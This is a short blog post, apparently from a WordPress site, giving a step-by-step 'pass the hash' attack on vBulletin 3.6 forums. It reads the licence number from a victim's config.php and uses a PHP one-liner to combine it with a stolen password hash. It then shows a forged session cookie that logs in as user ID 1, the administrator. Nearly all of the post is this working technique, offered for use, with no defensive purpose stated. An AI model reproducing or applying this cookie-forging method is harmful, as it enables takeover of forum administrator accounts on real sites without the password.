Passing the Hash in VBullettin

  1. Find md5 hash from VBulettin database
  2. Find Licence Number from VBulettin config.php
  3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)
  4. Create Cookie

1. Find md5 hash from VBulettin database

We consider that you already  have the md5 hash for password from VBulettin database… (SELECT password FROM user) the format for this md5 hash is -> md5(md5($pass).$salt) [PHP]
ex. 6e84265e3ba153be675164a64dd801b0

2. Find Licence Number from VBulettin config.php

We consider that you have access to victim’s web dir ex. /home/<user>/public_html/
Then you just need to read /home/<user>/public_html/includes/config.php and you will se something like this…

VBulleting conf

/*================================================*\
|| ################################################ ||
|| # vBulletin 3.6.X – Licence Number XXXXXXXXXX
|| # —————————————————————-
|| # All PHP code in this file is ?2000-2007 Jelsoft Enterprises Ltd.
|| # This file may not be redistributed in whole or significant part.
|| # —————- VBULLETIN IS NOT FREE SOFTWARE —————-
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html
|| ################################################ ||
\*================================================*/

so now you have the licence number ex. XXXXXXXXXX

3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)

VBulleting uses these technique for cookie’s hash -> md5($hashInDB . $VBlicence) so we will make a php script to change the initial md5 hash to a propertly md5 hash for cookie

<?php
echo md5(“6e84265e3ba153be675164a64dd801b0″ . “XXXXXXXXXX”);
?>

result:
ex. a52a7b7c8940cd35ca20827351f2eb1c

4. Create Cookie

A general example for vbulletin’s cookie…

Cookie: bblastvisit=1185263194; bblastactivity=0; bbuserid=124; bbpassword=4ec842e9ece18137271ff9b8f00d07b8

The cookie that will work for this scenario …

Cookie: bbuserid=1; bbpassword=a52a7b7c8940cd35ca20827351f2eb1c

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s